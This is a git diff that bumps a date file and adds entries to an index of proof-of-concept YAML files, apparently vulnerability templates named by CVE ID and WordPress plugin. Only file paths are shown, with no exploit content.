diff --git a/date.txt b/date.txt index 7e53ea86ed..cd765ecede 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240822 +20240823 diff --git a/poc.txt b/poc.txt index 8972ea2383..4b5c09733f 100644 --- a/poc.txt +++ b/poc.txt @@ -3663,6 +3663,7 @@ ./poc/auth/login-as-customer-or-user-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/login-as-customer-or-user-plugin.yaml ./poc/auth/login-as-customer-or-user.yaml +./poc/auth/login-as-users-0e39f1f2ee0d17c654853b5f04aceb5b.yaml ./poc/auth/login-attempts-limit-wp-a27b928af3555fe96c9110a0c596251e.yaml ./poc/auth/login-attempts-limit-wp-a3d4d3eee498ab5be06833bab20d1678.yaml ./poc/auth/login-attempts-limit-wp.yaml @@ -3974,12 +3975,14 @@ ./poc/auth/multiple-post-passwords-c4023fed8d5ddfc28cec448447826074.yaml ./poc/auth/multiple-post-passwords.yaml ./poc/auth/mycred-00ffa23d5c48d24d4837746f02ce0263.yaml +./poc/auth/mycred-0ba5901497b34cfef40a203e86fad82f.yaml ./poc/auth/mycred-167b1689069341ae1373ef65caf6a7e2.yaml ./poc/auth/mycred-213821b28d4a15d3347e2d7540937de1.yaml ./poc/auth/mycred-215bb39cd24cfaf3c7acf4e324020e7a.yaml ./poc/auth/mycred-24bd66bd3e5bf279792175df9ac21b29.yaml ./poc/auth/mycred-252d1898a18cf06099cbdc2b8717c288.yaml ./poc/auth/mycred-597541d0b79a0c6362895f01e993f1e8.yaml +./poc/auth/mycred-5b86df80efa6b07ad02aa927c0bbfb50.yaml ./poc/auth/mycred-6477bf18cad6c823db485408d49b337b.yaml ./poc/auth/mycred-657249c74dcfd1c69ed803f7ade2353f.yaml ./poc/auth/mycred-78c60bc023056731606cd8fe6e484cad.yaml @@ -35166,6 +35169,7 @@ ./poc/cve/CVE-2024-27999-c77a895775d3643585822943d1340fe7.yaml ./poc/cve/CVE-2024-27999.yaml ./poc/cve/CVE-2024-28000-cf6ac978bbc80445dcf2da6ef53372ad.yaml +./poc/cve/CVE-2024-28000.yaml ./poc/cve/CVE-2024-28001-37a725cdeb2e43640f8b5b37ee68b599.yaml ./poc/cve/CVE-2024-28001.yaml ./poc/cve/CVE-2024-28002-d246eae6901505d7ec249d64baf8e0c4.yaml 
@@ -38281,6 +38285,7 @@ ./poc/cve/CVE-2024-35766.yaml ./poc/cve/CVE-2024-35767-73b7a679244b7ad191218a3cf64b6ae0.yaml ./poc/cve/CVE-2024-35767.yaml +./poc/cve/CVE-2024-35768-1f25d9ae7e4422f1fede1a610a06c13f.yaml ./poc/cve/CVE-2024-35768-ad9d4298895b2898fe0d8b7e72b459bb.yaml ./poc/cve/CVE-2024-35768.yaml ./poc/cve/CVE-2024-35769-f82dc7eccca54732b79253717fa94d1e.yaml @@ -39181,6 +39186,7 @@ ./poc/cve/CVE-2024-38673.yaml ./poc/cve/CVE-2024-38674-f4bef651de2f444a0b8d5c3f5550236e.yaml ./poc/cve/CVE-2024-38674.yaml +./poc/cve/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml ./poc/cve/CVE-2024-38675-4826fb05eaa1c318d3425e0adefbbbd3.yaml ./poc/cve/CVE-2024-38675.yaml ./poc/cve/CVE-2024-38676-9bc1ea991477b3e5c0b9aa7cce839be9.yaml @@ -39634,6 +39640,7 @@ ./poc/cve/CVE-2024-39664.yaml ./poc/cve/CVE-2024-39665-eb86ffef2c0d7c6205176cce262c3985.yaml ./poc/cve/CVE-2024-39665.yaml +./poc/cve/CVE-2024-39666-0b1e987c7e40ab204e56556fca06f4e7.yaml ./poc/cve/CVE-2024-39668-a8fc61243890a8b4d5c1db69e4467701.yaml ./poc/cve/CVE-2024-39668.yaml ./poc/cve/CVE-2024-39678-70f27dc1298f6ae4ac79bb3c3bf23903.yaml @@ -40011,6 +40018,7 @@ ./poc/cve/CVE-2024-43212-fa7c63c9c1acaf40e2a0fa149e79e1fd.yaml ./poc/cve/CVE-2024-43212.yaml ./poc/cve/CVE-2024-43213-035ab3596c728eee900f004610ee954d.yaml +./poc/cve/CVE-2024-43213-dcd45d0b65b09157c6e00bd46d98cfce.yaml ./poc/cve/CVE-2024-43213.yaml ./poc/cve/CVE-2024-43214-e3240af5e23abfaaa28c0e373364a098.yaml ./poc/cve/CVE-2024-43214.yaml @@ -40022,6 +40030,7 @@ ./poc/cve/CVE-2024-43217-45501803094a8231702c0947dd4fac76.yaml ./poc/cve/CVE-2024-43217.yaml ./poc/cve/CVE-2024-43218-0326506cc055bcde33922247269b6844.yaml +./poc/cve/CVE-2024-43218-a6753f46d4e4972ed286e22be5c0f359.yaml ./poc/cve/CVE-2024-43218.yaml ./poc/cve/CVE-2024-43219-7b8d7750f9d277ba2b03b2344f90c2f4.yaml ./poc/cve/CVE-2024-43219-f14ca834a32fdfd1c7fc5fa3461f213d.yaml 
@@ -40056,26 +40065,73 @@ ./poc/cve/CVE-2024-43235.yaml ./poc/cve/CVE-2024-43236-0aa244f387067d6fa1a2f360a122d1ca.yaml ./poc/cve/CVE-2024-43236.yaml +./poc/cve/CVE-2024-43238-1dfbdedd48f79e362612fd3d52464156.yaml +./poc/cve/CVE-2024-43239-5acc6b9bdc039d71efd1b6883dc7079d.yaml ./poc/cve/CVE-2024-4324-83e6d760adb900f9290e996e03752999.yaml ./poc/cve/CVE-2024-4324.yaml +./poc/cve/CVE-2024-43240-602dd094f3b3105ea72425933e143ccf.yaml +./poc/cve/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml +./poc/cve/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml +./poc/cve/CVE-2024-43244-939e704d270328b1ff062eb9844d75b2.yaml +./poc/cve/CVE-2024-43245-3fc6d2c3f5750fb0be80ffc0c8d01f2d.yaml +./poc/cve/CVE-2024-43246-e4931f33e22f3b0d81b8bf3466c11868.yaml +./poc/cve/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml +./poc/cve/CVE-2024-43248-02766ce7753cfbf027f4bd7e7c8beefa.yaml +./poc/cve/CVE-2024-43249-9332e35d2ca00b85ffd1d6c5886e63ec.yaml +./poc/cve/CVE-2024-43250-9c99a7674eaede7a5abac359a81cf9bb.yaml +./poc/cve/CVE-2024-43251-bdf342d7649c7626a07f0ede9a708ec4.yaml +./poc/cve/CVE-2024-43252-bc3586df4bd9df275d63c3b38b4b7691.yaml +./poc/cve/CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af.yaml +./poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml +./poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml +./poc/cve/CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76.yaml +./poc/cve/CVE-2024-43257-2f7a51a2e99eeed0090ae78fd8a6d6c1.yaml +./poc/cve/CVE-2024-43258-f0ba53155846a7fcd61cd515004d3b42.yaml +./poc/cve/CVE-2024-43259-72e8e395070ef39fd958898991e5b6b6.yaml +./poc/cve/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml +./poc/cve/CVE-2024-43261-678706860c4e57cd059d9f119dea313a.yaml +./poc/cve/CVE-2024-43262-1a861225d324308d9705bd093a6382ee.yaml +./poc/cve/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml +./poc/cve/CVE-2024-43264-ac09743b47220dfa62720b1de75e8fc4.yaml +./poc/cve/CVE-2024-43265-8234cc6f4ac66f2b070661ce02359592.yaml 
+./poc/cve/CVE-2024-43266-c9b30abb24b2129a7fa8624964d4d1b7.yaml +./poc/cve/CVE-2024-43267-7f3c630c635d1a10a9e449566a113d16.yaml +./poc/cve/CVE-2024-43268-eb378d1bac11bc8d0bff41eae43c13fe.yaml +./poc/cve/CVE-2024-43269-0c1f242de365e56e055b30f6f86d4ff6.yaml +./poc/cve/CVE-2024-43270-00633de45e44065b1555bce09f62fb9d.yaml +./poc/cve/CVE-2024-43271-b31214f9813d473f3cd67a61f9d552af.yaml +./poc/cve/CVE-2024-43272-4bb700a4fd663240eafaf4808a8dc083.yaml +./poc/cve/CVE-2024-43273-731e5bc58cf2a73042628e403eeeb161.yaml +./poc/cve/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml ./poc/cve/CVE-2024-43277-6b4940f2eac79c6e5fa7f9ba0cc0604e.yaml ./poc/cve/CVE-2024-43277.yaml +./poc/cve/CVE-2024-43278-fd5de4ff2b6a98fd4fced1b05d5ba695.yaml +./poc/cve/CVE-2024-43279-4856fcf32dd027479e787b6af4d881c8.yaml +./poc/cve/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml +./poc/cve/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml +./poc/cve/CVE-2024-43282-4139e9028e5e4aaf19dfb7d072072d16.yaml +./poc/cve/CVE-2024-43283-48bd98c02d59c632156d003781e3c65c.yaml +./poc/cve/CVE-2024-43284-8f3b74619f71500671f7b82070889832.yaml ./poc/cve/CVE-2024-43285-2259cac19eda110255245b91d280697e.yaml ./poc/cve/CVE-2024-43285.yaml ./poc/cve/CVE-2024-43287-b8c9808356b0d4ca60466a01cf2f6ffc.yaml ./poc/cve/CVE-2024-43287.yaml +./poc/cve/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml +./poc/cve/CVE-2024-43289-fde4ffac9ff58bcd12d9665650ffc6f2.yaml ./poc/cve/CVE-2024-4329-0b2116d78c4eba82eeda084c20215115.yaml ./poc/cve/CVE-2024-4329.yaml ./poc/cve/CVE-2024-43290-6aaddd95421bac5d3791131102bf0d20.yaml ./poc/cve/CVE-2024-43290.yaml ./poc/cve/CVE-2024-43291-dabd8edbe180773a366911d00bf7b3d8.yaml ./poc/cve/CVE-2024-43291.yaml +./poc/cve/CVE-2024-43292-b35a55b76b75876dc21a9c95e4bab296.yaml ./poc/cve/CVE-2024-43293-4ded08b075aff72e2714da1bf0758502.yaml ./poc/cve/CVE-2024-43293.yaml ./poc/cve/CVE-2024-43294-74cdcbe12dafdf14c55db65337423666.yaml ./poc/cve/CVE-2024-43294.yaml 
./poc/cve/CVE-2024-43295-e48e7df4f337c104fbb6960b7a073918.yaml ./poc/cve/CVE-2024-43295.yaml +./poc/cve/CVE-2024-43296-0b5d50fa95a43be7a612dc20668129af.yaml ./poc/cve/CVE-2024-43297-d97e1b82684ec5fda05751316b5bf585.yaml ./poc/cve/CVE-2024-43297.yaml ./poc/cve/CVE-2024-43298-6c52a4ccd32e47bf034fb72c4a4cdca9.yaml @@ -40086,14 +40142,21 @@ ./poc/cve/CVE-2024-43301.yaml ./poc/cve/CVE-2024-43302-7eb579c0aaaf235ed55e89a50bb63283.yaml ./poc/cve/CVE-2024-43302.yaml +./poc/cve/CVE-2024-43303-01fb8c2bb8cae6a750e6ca67b3ff8b01.yaml ./poc/cve/CVE-2024-43304-195bc96c646d6ca6175e1ee2e543c7e0.yaml ./poc/cve/CVE-2024-43304.yaml ./poc/cve/CVE-2024-43305-1d51a608cf1e6b149a393660c5257486.yaml ./poc/cve/CVE-2024-43305.yaml +./poc/cve/CVE-2024-43306-f131b00187e803d708a0f231c364afbd.yaml +./poc/cve/CVE-2024-43307-6e8a4afc370a9e3e066e1d471010cbb3.yaml +./poc/cve/CVE-2024-43308-192b2df1f5f4f85d5f8625397708ef74.yaml +./poc/cve/CVE-2024-43309-ef7ed8aea74d6ec75a483884f5e9e3b2.yaml ./poc/cve/CVE-2024-43310-f45a761baa6c56237775fa475b020a07.yaml ./poc/cve/CVE-2024-43310.yaml +./poc/cve/CVE-2024-43311-e7d0427a9d0846d998d7b31c89a0ded9.yaml ./poc/cve/CVE-2024-43312-a955ef755ede1aff915d714d801fd4f2.yaml ./poc/cve/CVE-2024-43312.yaml +./poc/cve/CVE-2024-43313-5cfc463b9da71902790bb449cb8a197f.yaml ./poc/cve/CVE-2024-43314-c4f69d44bf9c33670d3edf1035d16ec7.yaml ./poc/cve/CVE-2024-43314.yaml ./poc/cve/CVE-2024-43315-22f15f2b106abaa3fabeaf39acb88e9f.yaml 
@@ -40102,8 +40165,12 @@ ./poc/cve/CVE-2024-43316.yaml ./poc/cve/CVE-2024-43317-011ac22d3cc6a5c25823442686fbcdc2.yaml ./poc/cve/CVE-2024-43317.yaml +./poc/cve/CVE-2024-43318-2b25423b32cf8d58d4d746ef14271f2d.yaml +./poc/cve/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml ./poc/cve/CVE-2024-43320-7a90f649b86cc56b7a348322fbac253a.yaml ./poc/cve/CVE-2024-43320.yaml +./poc/cve/CVE-2024-43321-96ff47f665eb548628bdc9a031d6d70f.yaml +./poc/cve/CVE-2024-43322-7ad3832de8b95672975dfcfb60f3598f.yaml ./poc/cve/CVE-2024-43323-1e55a206c0d1e018c5ca8cb550ad6b43.yaml ./poc/cve/CVE-2024-43323.yaml ./poc/cve/CVE-2024-43324-f70541b1201ac529a1d78e7fc9af3a3e.yaml @@ -40112,16 +40179,20 @@ ./poc/cve/CVE-2024-43325.yaml ./poc/cve/CVE-2024-43326-24f0ba897b67329ec3ddf6753f94ed32.yaml ./poc/cve/CVE-2024-43326.yaml +./poc/cve/CVE-2024-43327-8726b3a0797315fcc152dad280cbac4b.yaml +./poc/cve/CVE-2024-43328-732c7a81ff60a18d2ff887b256fba242.yaml ./poc/cve/CVE-2024-43329-67a50fee28efbf96992a3faa792ae691.yaml ./poc/cve/CVE-2024-43329.yaml ./poc/cve/CVE-2024-4333-f46d8860d5d05aeb17e4da3bc1c85b85.yaml ./poc/cve/CVE-2024-4333.yaml ./poc/cve/CVE-2024-43330-9d2e621ed81c65b734c8c2d120237457.yaml ./poc/cve/CVE-2024-43330.yaml +./poc/cve/CVE-2024-43331-4020a3e72ffe419fc999b976bfb5351f.yaml ./poc/cve/CVE-2024-43331-b3b203fb21a1b3cd285f2a3e0685b04a.yaml ./poc/cve/CVE-2024-43331.yaml ./poc/cve/CVE-2024-43332-53d4557dc08feb794f7aa79a5132bebf.yaml ./poc/cve/CVE-2024-43332.yaml +./poc/cve/CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0.yaml ./poc/cve/CVE-2024-43336-28f522c815326c862a095ad99702db7f.yaml ./poc/cve/CVE-2024-43336.yaml ./poc/cve/CVE-2024-43337-d59a162bda0a92fcb5cbdc9c17791b8c.yaml 
@@ -40134,16 +40205,25 @@ ./poc/cve/CVE-2024-43340.yaml ./poc/cve/CVE-2024-43341-7cb78fbac960da5bc11a78009c156b3f.yaml ./poc/cve/CVE-2024-43341.yaml +./poc/cve/CVE-2024-43342-3188eb24eebca6379b805dcc2fd53688.yaml ./poc/cve/CVE-2024-43343-bd86d015b232e15272dc87f2bcd25950.yaml ./poc/cve/CVE-2024-43343.yaml +./poc/cve/CVE-2024-43344-dd2bfc771cca501ba1c20aa66e532070.yaml +./poc/cve/CVE-2024-43345-818187bf525840885c083c5886f89859.yaml +./poc/cve/CVE-2024-43346-461457ac208690c9e7435e5f9cf93bf1.yaml ./poc/cve/CVE-2024-43347-0ff8bf2832d5ae37d05ab294908e3044.yaml ./poc/cve/CVE-2024-43347.yaml +./poc/cve/CVE-2024-43348-1d80aee807a5a09c59890436b5a4ba06.yaml ./poc/cve/CVE-2024-43349-7fa6ced0e3688a0b29dd0f4527ae5d77.yaml ./poc/cve/CVE-2024-43349.yaml ./poc/cve/CVE-2024-4335-b652f11b1fd244c356f7f9040d2d61fc.yaml ./poc/cve/CVE-2024-4335.yaml +./poc/cve/CVE-2024-43350-7658ea1ea1a448ef16e7448bb1e7b7a3.yaml ./poc/cve/CVE-2024-43351-4309475ec19267ac7d3446460f31cb63.yaml ./poc/cve/CVE-2024-43351.yaml +./poc/cve/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml +./poc/cve/CVE-2024-43353-f420c4e69c0e2367aa76bcdf09d1f8d5.yaml +./poc/cve/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml ./poc/cve/CVE-2024-43355-aaaae66dd8d3768a39f3d3ed3c2c4630.yaml ./poc/cve/CVE-2024-43355.yaml ./poc/cve/CVE-2024-43356-05ef8f8be0b196ca83c544147054d339.yaml @@ -40962,6 +41042,7 @@ ./poc/cve/CVE-2024-5489.yaml ./poc/cve/CVE-2024-5501-ef276788ff5605e6f36a518160e844c2.yaml ./poc/cve/CVE-2024-5501.yaml +./poc/cve/CVE-2024-5502-46f49a6a29c567a0601ab29368ea1138.yaml ./poc/cve/CVE-2024-5503-19d06aa0a465a31a35fc811375db77be.yaml ./poc/cve/CVE-2024-5503-22284592e7f2d4be691954a9ef8c96d2.yaml ./poc/cve/CVE-2024-5503.yaml 
@@ -41016,6 +41097,7 @@ ./poc/cve/CVE-2024-5582-65655490bb0f32fe01c9013362ded541.yaml ./poc/cve/CVE-2024-5582.yaml ./poc/cve/CVE-2024-5583-4bf5df60bad728c4d77db23548e2e248.yaml +./poc/cve/CVE-2024-5583.yaml ./poc/cve/CVE-2024-5584-9e83a16e4845144224090f291ae51eb8.yaml ./poc/cve/CVE-2024-5584.yaml ./poc/cve/CVE-2024-5595-ceb803f50c0ac8e651f08593893d8cdd.yaml @@ -41473,6 +41555,7 @@ ./poc/cve/CVE-2024-6365.yaml ./poc/cve/CVE-2024-6366-ea7ffa5d59aec7bd8b9ff2b236517b74.yaml ./poc/cve/CVE-2024-6386-4eed3d73004ed1a5572fcec0bbe99148.yaml +./poc/cve/CVE-2024-6386.yaml ./poc/cve/CVE-2024-6387.yaml ./poc/cve/CVE-2024-6390-5e93fafd922f6a8ef1963ab0cc893053.yaml ./poc/cve/CVE-2024-6390.yaml @@ -41743,6 +41826,7 @@ ./poc/cve/CVE-2024-6869-5e7fa08dfa3c0ebbfb8e613b40ae4241.yaml ./poc/cve/CVE-2024-6869.yaml ./poc/cve/CVE-2024-6870-761b9012a27c3dd65906ec5f425408c2.yaml +./poc/cve/CVE-2024-6870.yaml ./poc/cve/CVE-2024-6872-906780e4d16fb616e7eb84af4109c545.yaml ./poc/cve/CVE-2024-6872.yaml ./poc/cve/CVE-2024-6883-bf3d691e7629ebe7204e53eef0a10a24.yaml @@ -41817,6 +41901,8 @@ ./poc/cve/CVE-2024-7247.yaml ./poc/cve/CVE-2024-7257-33ebc9b4c8b24813569400d3b00f9ba3.yaml ./poc/cve/CVE-2024-7257.yaml +./poc/cve/CVE-2024-7258-7733e570fd91ef0e0dd37c76462776c5.yaml +./poc/cve/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml ./poc/cve/CVE-2024-7291-9e11faff80d98ce3a78b182e2348528f.yaml ./poc/cve/CVE-2024-7291.yaml ./poc/cve/CVE-2024-7301-b82f30bc7f77018db154ad54534c5d05.yaml @@ -41836,6 +41922,7 @@ ./poc/cve/CVE-2024-7382-0f2463e87e68ece5440ee53e60a45241.yaml ./poc/cve/CVE-2024-7382.yaml ./poc/cve/CVE-2024-7384-3cbb9a04d55569f550da959253703e68.yaml +./poc/cve/CVE-2024-7384.yaml ./poc/cve/CVE-2024-7388-71222ccca29202f8dadfe5a2196ab818.yaml ./poc/cve/CVE-2024-7388.yaml ./poc/cve/CVE-2024-7389-3c018c5673a3c698e331d5cecece4963.yaml 
@@ -41874,6 +41961,7 @@ ./poc/cve/CVE-2024-7548.yaml ./poc/cve/CVE-2024-7556-b7fed9351bafa7783a59e9c29c4c745a.yaml ./poc/cve/CVE-2024-7556.yaml +./poc/cve/CVE-2024-7559-0036d3af189dfdcdecf071d33e7a3e17.yaml ./poc/cve/CVE-2024-7560-ce54c359794ac142d8dfa3e7571236b5.yaml ./poc/cve/CVE-2024-7560.yaml ./poc/cve/CVE-2024-7561-dd941493ec03049c383c879de09e421d.yaml @@ -41919,6 +42007,7 @@ ./poc/cve/CVE-2024-7777-e2bdcc8b58b83d53647a50d88143707d.yaml ./poc/cve/CVE-2024-7777.yaml ./poc/cve/CVE-2024-7778-f6a8eafbead2f11189d44eaa4bf9f2d7.yaml +./poc/cve/CVE-2024-7778.yaml ./poc/cve/CVE-2024-7780-4daa2f3a76c9e2c11c9a8f6d36ef5ef2.yaml ./poc/cve/CVE-2024-7780.yaml ./poc/cve/CVE-2024-7782-33cd7b02fe64ca6292df042c7ea86c84.yaml @@ -41926,7 +42015,9 @@ ./poc/cve/CVE-2024-7827-a9ee234376e66a977fd41d75d242919a.yaml ./poc/cve/CVE-2024-7827.yaml ./poc/cve/CVE-2024-7836-c3f06662e71acb6bbefc389fb9e7704e.yaml +./poc/cve/CVE-2024-7836.yaml ./poc/cve/CVE-2024-7848-a4dfad44ff5af24a4a686e6afb9aa2fb.yaml +./poc/cve/CVE-2024-7848.yaml ./poc/cve/CVE-2024-7850-5b82e2527caadc3756488893ee8930f4.yaml ./poc/cve/CVE-2024-7850.yaml ./poc/cve/CVE-2024-7854-c405929374c8ffa2432434eb86f570c7.yaml @@ -59678,6 +59769,7 @@ ./poc/microsoft/white-label-cms-21f790f886a508204a6d79b9c5155bc7.yaml ./poc/microsoft/white-label-cms-272dfd7025c6616944dcebc3b3edd27c.yaml ./poc/microsoft/white-label-cms-53cd08acf6eebef08aab7e9f2df58232.yaml +./poc/microsoft/white-label-cms-666f157d61e42bbd8a6cd2cf31809b57.yaml ./poc/microsoft/white-label-cms-b166eba2be9153930cd892a3828217b0.yaml ./poc/microsoft/white-label-cms-cf61bb06d2f0eb06f00e67756a62407f.yaml ./poc/microsoft/white-label-cms-d41d8cd98f00b204e9800998ecf8427e.yaml 
@@ -64694,6 +64786,10 @@ ./poc/other/biteship-8c3214c3a61a8360d72b6a3b3aa6df23.yaml ./poc/other/biteship-b991bdd855711ef3d58623bc7370e7fa.yaml ./poc/other/biteship.yaml +./poc/other/bitformpro-a2ee1f9b5da0373c3a2f8c7f741c1fed.yaml +./poc/other/bitformpro-c1951a840a2ea27fbc40d83eac2e0432.yaml +./poc/other/bitformpro-d139e243b64b91b847d04cde6b5cce90.yaml +./poc/other/bitformpro-d755f86f5f98181fb2d499fd64b215af.yaml ./poc/other/bithighway-product.yaml ./poc/other/bitkeeper.yaml ./poc/other/bitly.yaml @@ -65792,6 +65888,7 @@ ./poc/other/businessexpo.yaml ./poc/other/busiprof-157cf14a019f2f39567d396451ba436d.yaml ./poc/other/busiprof-3e9ea6cb923b68a31d48f29cdc3c95d0.yaml +./poc/other/busiprof-ad5d3d293e421d6fd904811f4fd425fa.yaml ./poc/other/busiprof-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/busiprof-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/busiprof-theme.yaml @@ -66880,6 +66977,7 @@ ./poc/other/cleantalk-spam-protect-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/cleantalk-spam-protect-plugin.yaml ./poc/other/cleantalk-spam-protect.yaml +./poc/other/clearfy-2ca2a060d0fe3d1049a304a11c885f52.yaml ./poc/other/clearfy-550ff7e8c6e09cc736e7f2542671495e.yaml ./poc/other/clearfy-c0336a65d0bc0eb447d7d2f7a087f8a2.yaml ./poc/other/clearfy-cf3fed297e3831245af4f41c4a412af1.yaml @@ -67058,6 +67156,8 @@ ./poc/other/clover-online-orders-56bbfa33086145c5853aa24f3681cc5a.yaml ./poc/other/clover-online-orders-a88a3d82b56d6bb2eceae8b92ff3c51b.yaml ./poc/other/clover-online-orders-ae0fb38ae7706d7e81dac3edf540dc72.yaml +./poc/other/clover-online-orders-c1504d4070a1a5e1a5914ef3c1070a2a.yaml +./poc/other/clover-online-orders-d77a8bf96347576e414fb350aeaf95b7.yaml ./poc/other/clover-online-orders.yaml ./poc/other/club-management-software-51fc41ad94a54763e52ddcc22cd04e65.yaml ./poc/other/club-management-software.yaml 
@@ -67914,6 +68014,7 @@ ./poc/other/contest-gallery-1f25062dfe0eaacffe2280aab6f92ff8.yaml ./poc/other/contest-gallery-323b96f00ad116e47f3edde3efb3b797.yaml ./poc/other/contest-gallery-356b17ac7a3cbf37f03ac814e78cb562.yaml +./poc/other/contest-gallery-36b5f89448d064c7305ddcbc679586d1.yaml ./poc/other/contest-gallery-376c740b45ad9e886368212a5f31f016.yaml ./poc/other/contest-gallery-41f26c36efd0640befa355bd3c87e70c.yaml ./poc/other/contest-gallery-4394367c0b844f62ffb487901a7ab495.yaml @@ -69361,6 +69462,7 @@ ./poc/other/discy-57105b51f4903a49473849de5abbe472.yaml ./poc/other/discy.yaml ./poc/other/disneyplus-phish.yaml +./poc/other/display-a-meta-field-as-block-3651ac54124280b3e2d4d7a808a8f468.yaml ./poc/other/display-admin-page-on-frontend-6c0fa46386393b85d0ad0c373ab077eb.yaml ./poc/other/display-admin-page-on-frontend.yaml ./poc/other/display-custom-post-aa757b5702d208e7dc541f210bf378bd.yaml @@ -70086,6 +70188,7 @@ ./poc/other/e2pdf-41451f8ab0320b9bdaee2534b639fa4d.yaml ./poc/other/e2pdf-4bc4b8ed199b4ecc105e9687f540b218.yaml ./poc/other/e2pdf-ad7756ac25f7c2d461fdf573593bf588.yaml +./poc/other/e2pdf-b0d40d85770d0e3959eca97a13f2f029.yaml ./poc/other/e2pdf-d4de66f8961ceb83151e4edc41f8e53c.yaml ./poc/other/e2pdf-f5e45b0c3960892499c8d3b1509bee7b.yaml ./poc/other/e2pdf.yaml @@ -70985,6 +71088,7 @@ ./poc/other/embedpress-4c19e1bca820cb242174b7a9d0ea8299.yaml ./poc/other/embedpress-5022a01b1a8a064b5566e5d4d81337dc.yaml ./poc/other/embedpress-57a4a208af2b4ef2c84c9964d7d23928.yaml +./poc/other/embedpress-63790850863aa3a88ecce00a79a7021b.yaml ./poc/other/embedpress-64fd27994160f6b6dd5da6d42c0bddc8.yaml ./poc/other/embedpress-6941dedfddf8fc169d5f576d749bb2a4.yaml ./poc/other/embedpress-6ca79d6ef0533e6bc0b4d1e1dd0fd443.yaml 
@@ -72979,6 +73083,7 @@ ./poc/other/formcraft3-1abcc6fd96ea11726161daf8ff61e96c.yaml ./poc/other/formcraft3.yaml ./poc/other/formfacade-2d90c45aeeb16b4b940215c06811a0b1.yaml +./poc/other/formfacade-48c25c5fd30ad0a0b1bed685bcfb7af4.yaml ./poc/other/formfacade.yaml ./poc/other/formforall-3ca8822ef010b490061fcfa39d3c005a.yaml ./poc/other/formforall.yaml @@ -73966,6 +74071,7 @@ ./poc/other/give.yaml ./poc/other/giveaway-1d9e0bf21577ede31febad46bce13674.yaml ./poc/other/giveaway.yaml +./poc/other/givingpress-lite-f13848717586edd56855949bd81c07fd.yaml ./poc/other/gkrellm.yaml ./poc/other/glass-b3268283daf190fd77277f208bd83ee4.yaml ./poc/other/glass.yaml @@ -74366,6 +74472,7 @@ ./poc/other/gutenslider-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/gutenslider-plugin.yaml ./poc/other/gutenslider.yaml +./poc/other/gutentor-d377e101a76164370c9cc0ec45a485ee.yaml ./poc/other/gutenverse-40a79e4610379f5cd721264ce32ca881.yaml ./poc/other/gutenverse-6f744d9cd8863d765631de4d3721f56e.yaml ./poc/other/gutenverse-d18f386a56dccce0e578f26d0a128ebd.yaml @@ -74905,6 +75012,7 @@ ./poc/other/hqtheme-extra-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/hqtheme-extra-plugin.yaml ./poc/other/hqtheme-extra.yaml +./poc/other/hr-management-eb3b99f576f6e9904bb734d15faf495b.yaml ./poc/other/hreflang-manager-lite-4fdca8511452f1b9eaf9cfabe504c2f4.yaml ./poc/other/hreflang-manager-lite-c79e04798382f59535d810f01cec980c.yaml ./poc/other/hreflang-manager-lite-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml 
@@ -74989,6 +75097,7 @@ ./poc/other/html5-soundcloud-player-with-playlist-4d1667fb6e30b2ac93e754f36234469e.yaml ./poc/other/html5-soundcloud-player-with-playlist.yaml ./poc/other/html5-video-player-0d2cf6941c370b58ffb31226e43735d1.yaml +./poc/other/html5-video-player-ca0016b58a304c45cd93a8c5f0474313.yaml ./poc/other/html5-video-player-cba7fe3e122d338cdcaadebd04df764f.yaml ./poc/other/html5-video-player-eb51e10eb4da657b0275fe0f0befe3f2.yaml ./poc/other/html5-video-player-with-playlist-883e01b86f50bd15b1e6802446307f82.yaml @@ -75162,9 +75271,12 @@ ./poc/other/icegram-4ff957997aaadab58fd8b72e836e6479.yaml ./poc/other/icegram-82a9becdc162f5bfb48c752d9aa10047.yaml ./poc/other/icegram-9c8e80fa2e8ff53b0c42c7e0e01329cb.yaml +./poc/other/icegram-a0b801eb66ca58090afd94117ad9974e.yaml ./poc/other/icegram-ad72b8ca7fcf72f961a5f9bbde7a51f2.yaml +./poc/other/icegram-fdccf66c281808c211e00f643959c680.yaml ./poc/other/icegram-fedfea5addd692ebf0d9057d63bb92ea.yaml ./poc/other/icegram-rainmaker-2973e938414f006ad90e20818eae97df.yaml +./poc/other/icegram-rainmaker-409f16694b32ad9df1caa739ea6dac70.yaml ./poc/other/icegram-rainmaker.yaml ./poc/other/icegram.yaml ./poc/other/icewarp_server.yaml @@ -75609,6 +75721,7 @@ ./poc/other/indeed-job-importer.yaml ./poc/other/indeed-membership-pro-10f878c021d16b7ca46625504c67b941.yaml ./poc/other/indeed-membership-pro-1f404e2e090055cfa4d9b05683a60ba4.yaml +./poc/other/indeed-membership-pro-3298a85f8b58f139b4e851a0d9e6de1d.yaml ./poc/other/indeed-membership-pro-5d47e243e254d1baa4cd23914b0a4b5c.yaml ./poc/other/indeed-membership-pro-61d0345af5bd458935f32bc02960667b.yaml ./poc/other/indeed-membership-pro-64a53bf07001495502b280340bedc78c.yaml 
